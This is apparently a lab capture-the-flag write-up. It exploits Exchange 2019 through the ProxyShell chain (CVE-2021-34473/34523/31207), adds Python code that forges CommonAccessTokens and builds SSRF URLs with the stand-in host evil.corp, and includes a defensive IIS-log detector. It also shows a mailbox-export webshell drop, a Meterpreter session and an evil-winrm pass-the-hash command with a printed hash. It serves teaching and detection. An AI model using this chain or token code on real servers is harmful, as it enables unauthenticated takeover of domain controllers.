Logonshell
Overview
Logonshell is a very easy Windows box hosting Microsoft Exchange Server 2019
RTM (build 15.2.221.12) on the domain edelweiss.htb; the Exchange host is also
the domain controller. The Exchange stack is vulnerable to ProxyShell
(CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207): a pre-auth path-confusion
SSRF in the Autodiscover front end, a privilege elevation in the Exchange
PowerShell back end, and a post-auth arbitrary file write through mailbox
export, which together yield pre-authenticated RCE. The SSRF reaches the
PowerShell back end carrying a forged access token for
Administrator@edelweiss.htb, a mailbox export drops an ASPX webshell under the
web root, and a Metasploit module turns that webshell into a Meterpreter
session. The Administrator NTLM hash recovered from that session is then passed
to evil-winrm for a stable shell.
Path: Exchange 2019 RTM → ProxyShell auth bypass → impersonation token → Meterpreter shell → evil-winrm (pass-the-hash) → Administrator.
Enumeration
The target exposes a large number of ports consistent with an Exchange server acting as a domain controller.
$ nmap 10.129.227.141 -sV
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
81/tcp open hosts2-ns
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
464/tcp open kpasswd5
465/tcp open smtps
587/tcp open submission
593/tcp open http-rpc-epmap
636/tcp open ldapssl
808/tcp open ccproxy-http
1801/tcp open msmq
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl

Browsing to https://10.129.227.141/owa/auth/logon.aspx shows an Outlook Web
App login page whose footer carries a 2011 Microsoft copyright, which on its
own would suggest an Exchange 2010 era build. The exchange_proxyshell.py PoC
settles the question by reading the version back from the backend:
$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Exchange Backend Servers: ['dc.edelweiss.htb']
[+] dc.edelweiss.htb - version: 15.2.221.12
[+] dc.edelweiss.htb - version_short: Exchange Server 2019 RTM
[+] dc.edelweiss.htb - user: NT AUTHORITY\SYSTEM
The domain is edelweiss.htb, the server is dc.edelweiss.htb, and the
Exchange version is 15.2.221.12 (Exchange Server 2019 RTM) — squarely in
the ProxyShell-vulnerable range. The script also enumerates SMTP domains
(edelweiss.htb, htb.) and surfaces the Administrator LegacyDN, setting up
the SID lookup step.
Foothold — ProxyShell (CVE-2021-34473)
ProxyLogon and the Metasploit ProxyShell module were tried first, but neither
produced a usable shell.
The exchange_proxyshell.py PoC from
horizon3ai/proxyshell provides more
control. It successfully enumerates users from Active Directory (including
Administrator, Guest, krbtgt, anakin, and Exchange service accounts),
walks the SID-lookup chain to resolve Administrator@edelweiss.htb to SID
S-1-5-21-1677581083-3380853377-188903654-500, and generates a forged EWS
impersonation token:
$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Retrieved LegacyDN: /o=EDELWEISS/ou=Exchange Administrative Group .../cn=...Administrator
[+] Generated token for Administrator@edelweiss.htb - S-1-5-21-...-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z...
PS>
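The token shown above is a serialized Exchange CommonAccessToken, the object the /powershell back end deserializes into an identity when it arrives in the X-Rps-CAT query parameter (CVE-2021-34523). The following is an added example, not code from the write-up or from the horizon3ai PoC: it builds such a token, parses one back for triage, and assembles the CVE-2021-34473 request shape that carries it. The field layout follows the public PoC (single-letter tags, strings with a 1-byte length prefix, little-endian integers); the placeholder host evil.corp and the BUILTIN\Administrators group SID are assumptions taken from that PoC, not from the page.

```python
"""Exchange CommonAccessToken as abused by ProxyShell (added example).

Not from the write-up or the horizon3ai PoC. Layout follows the public PoC:
tag byte, then a 1-byte length-prefixed string or a little-endian integer.
"""
import base64
import struct
import urllib.parse
from typing import Dict, List, Optional, Tuple

# SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
GROUP_ATTRS = 0x7
LOCAL_ADMINS = "S-1-5-32-544"  # BUILTIN\Administrators (assumed group, as in the PoC)


def _tagged(tag: bytes, value: str) -> bytes:
    """tag + 1-byte length + UTF-8 bytes."""
    raw = value.encode()
    if len(raw) > 255:
        raise ValueError("field too long for a 1-byte length prefix")
    return tag + bytes([len(raw)]) + raw


def build_cat_token(logon_name: str, user_sid: str,
                    group_sid: str = LOCAL_ADMINS) -> str:
    """Return the base64 token the back end deserializes into the given identity."""
    tok = b"V" + b"\x01\x00"                       # version bytes, as in the public PoC
    tok += _tagged(b"T", "Windows")                # token type
    tok += b"C" + b"\x00"                          # not compressed
    tok += _tagged(b"A", "Kerberos")               # authentication type
    tok += _tagged(b"L", logon_name)               # logon name (UPN)
    tok += _tagged(b"U", user_sid)                 # user SID
    tok += b"G" + struct.pack("<II", 1, GROUP_ATTRS) + _tagged(b"", group_sid)  # one group
    tok += b"E" + b"\x00\x00\x00\x00"              # no extension data
    return base64.b64encode(tok).decode()


def decode_cat_token(token_b64: str) -> Dict[str, object]:
    """Parse a token (a truncated one too) back into fields, for triage."""
    raw = base64.b64decode(token_b64)
    out: Dict[str, object] = {}
    pos = 0

    def read_str() -> str:
        nonlocal pos
        n = raw[pos]
        pos += 1
        s = raw[pos:pos + n].decode()
        pos += n
        return s

    names = {"T": "type", "A": "auth", "L": "logon", "U": "sid"}
    while pos < len(raw):
        tag = chr(raw[pos])
        pos += 1
        if tag == "V":
            out["version"] = struct.unpack_from("<H", raw, pos)[0]
            pos += 2
        elif tag in names:
            out[names[tag]] = read_str()
        elif tag == "C":
            out["compressed"] = bool(raw[pos])
            pos += 1
        elif tag == "G":
            count = struct.unpack_from("<I", raw, pos)[0]
            pos += 4
            groups: List[Tuple[str, int]] = []
            for _ in range(count):
                attrs = struct.unpack_from("<I", raw, pos)[0]
                pos += 4
                groups.append((read_str(), attrs))
            out["groups"] = groups
        elif tag == "E":
            pos += 4  # extension count, ignored here
        else:
            raise ValueError(f"unknown tag {tag!r} at offset {pos - 1}")
    return out


def proxyshell_url(host: str, backend_path: str,
                   params: Optional[Dict[str, str]] = None) -> str:
    """CVE-2021-34473 request shape: the Autodiscover front end reduces the URL
    to what follows '@' and proxies that path to the back end as SYSTEM."""
    email = urllib.parse.quote("autodiscover/autodiscover.json?@evil.corp", safe="/@")
    query = "Email=" + email
    if params:
        query += "&" + urllib.parse.urlencode(params)
    return f"https://{host}/autodiscover/autodiscover.json?@evil.corp{backend_path}?{query}"


if __name__ == "__main__":
    t = build_cat_token("Administrator@edelweiss.htb",
                        "S-1-5-21-1677581083-3380853377-188903654-500")
    print(t)
    print(decode_cat_token(t))
    print(proxyshell_url("10.129.227.141", "/powershell/", {"X-Rps-CAT": t}))
```

The first 32 characters of the generated token match the prefix shown in the PoC output above (VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z decodes to the version, "Windows", the compression flag and "Kerberos"). On the defensive side, decode_cat_token is the useful half: it turns an X-Rps-CAT value lifted from an IIS log into the identity and groups the attacker claimed.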
The resulting session is an Exchange PowerShell remoting session reached
through the /powershell back end, so only Exchange cmdlets are available and
what they may do is bounded by the roles the impersonated user holds. Because
the forged token carries the Administrator identity (CVE-2021-34523),
New-ManagementRoleAssignment can grant the Mailbox Import Export role, and
New-MailboxExportRequest (CVE-2021-31207) then writes a mailbox export to a
path of the attacker's choosing. FilePath must be a UNC path even when the
destination is the local disk, so it is given here as \\127.0.0.1\c$\...:
PS> New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@edelweiss.htb
PS> New-MailboxExportRequest -Mailbox Administrator@edelweiss.htb -IncludeFolders "#Drafts#" `
-FilePath "\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\svjavxjxjjaqoyik.aspx" `
-ContentFilter "Subject -eq 'svjavxjxjjaqoyik'"
The export is a PST written into the aspnet_client directory under the web
root. The webshell itself is a draft message that the PoC plants through EWS
with the forged token, with the ASPX source in the body and the subject used as
the ContentFilter above. IIS hands the file to ASP.NET because of its .aspx
extension, and the page parser treats the PST bytes around the
<script runat="server"> block as literal content and compiles the block. PST
bodies are stored with a simple permutative encoding, so the PoC pre-encodes the
payload so that it lands in the file as plaintext. Switching the Metasploit
payload to windows/x64/meterpreter/reverse_http and pointing the exploit at the
placed webshell delivers a session.
The Meterpreter session proved unstable with this payload.
Root
Rather than troubleshoot the Meterpreter session, the Administrator NTLM hash
is dumped from it and passed directly to evil-winrm. WinRM listens on 5985/tcp
by default, a port the scan output above does not list, so confirm it is
reachable before blaming the hash if the connection fails:
$ evil-winrm -u Administrator -H f6b0de9c3fcb4522a273263d4adbfb16 -i edelweiss.htb

Domain Administrator access achieved.
Takeaways
- ProxyShell (CVE-2021-34473/34523/31207) chains an unauthenticated SSRF with a privilege elevation and a post-auth file write, so any unpatched, internet-facing Exchange server is a pre-auth RCE target. The fixes shipped in the April and May 2021 Exchange security updates; patch, or take Exchange off public exposure.
- The mailbox-export-to-webshell step is the hallmark of ProxyShell exploitation, and it leaves evidence: a .aspx file under the web root, a completed export request visible with Get-MailboxExportRequest, a new role assignment for Mailbox Import Export, and autodiscover.json?@ requests in the IIS logs. On an engagement, remove the request and the file when done.
- Even when the Meterpreter session is unstable, the NTLM hash dumped from it is sufficient for pass-the-hash over WinRM with evil-winrm, so an unstable foothold is still a full compromise.
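The request shapes the chain above leaves in IIS logs are distinctive enough to match mechanically. The following is an added example, not code from the write-up: it parses W3C-format IIS log lines and flags the ProxyShell indicators (an Autodiscover request whose query starts with @host and a smuggled back-end path, an X-Rps-CAT token, and a hit on an .aspx file under aspnet_client). The log lines are constructed to mirror this box's chain and are not real captures; the field list, the IPs and the evil.corp host are assumptions.

```python
"""ProxyShell indicators in IIS W3C logs (added example, not from the write-up).

SAMPLE_LOG is constructed: it mirrors the chain on this page but is not a real
capture. The #Fields header drives the parser, so a real u_ex*.log with more
columns parses the same way.
"""
import re
from typing import Dict, Iterator, List, Tuple

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-08-10 10:01:02 GET /owa/auth/logon.aspx url=https://dc.edelweiss.htb/owa/ 10.10.14.1 200
2021-08-10 10:02:15 GET /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.corp 10.10.14.1 200
2021-08-10 10:02:40 POST /autodiscover/autodiscover.json @evil.corp/powershell/?Email=autodiscover/autodiscover.json%3F@evil.corp&X-Rps-CAT=VgEAVAdXaW5kb3dzQwBB 10.10.14.1 200
2021-08-10 10:03:05 POST /aspnet_client/svjavxjxjjaqoyik.aspx - 10.10.14.1 200
2021-08-10 10:03:30 GET /autodiscover/autodiscover.xml - 10.10.14.7 401
"""

# Back-end paths ProxyShell reaches through the SSRF.
BACKENDS = ("/powershell", "/mapi/nspi", "/ews/exchange.asmx",
            "/autodiscover/autodiscover.xml")
# Query beginning with '@host' and then a path: the CVE-2021-34473 shape.
SSRF_RE = re.compile(r"^@[^/]*(/[^?]*)")


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the ProxyShell indicators present in one request record."""
    hits: List[str] = []
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "")
    if stem.endswith("/autodiscover/autodiscover.json"):
        m = SSRF_RE.match(query)
        if m:
            hits.append("proxyshell-ssrf")
            smuggled = m.group(1).lower()
            for backend in BACKENDS:
                if smuggled.startswith(backend):
                    hits.append("backend:" + backend)
                    break
            if "x-rps-cat=" in query.lower():
                hits.append("forged-token")
    elif stem.endswith(".aspx") and stem.startswith("/aspnet_client/"):
        # Nothing legitimate is served from aspnet_client; ProxyShell drops here.
        hits.append("aspx-under-aspnet_client")
    return hits


def find_proxyshell(text: str) -> List[Tuple[str, List[str]]]:
    """Scan a log and return (client IP, indicators) for every suspicious request."""
    found: List[Tuple[str, List[str]]] = []
    for rec in parse_w3c(text):
        hits = classify(rec)
        if hits:
            found.append((rec.get("c-ip", "?"), hits))
    return found


if __name__ == "__main__":
    for ip, hits in find_proxyshell(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The three flagged lines from the same client IP reconstruct the chain in order: SSRF probe against /mapi/nspi, forged token to /powershell, then the first request to the dropped webshell. The export request and the role assignment themselves do not appear in IIS logs; those live in the MSExchange Management event log and in Get-MailboxExportRequest output.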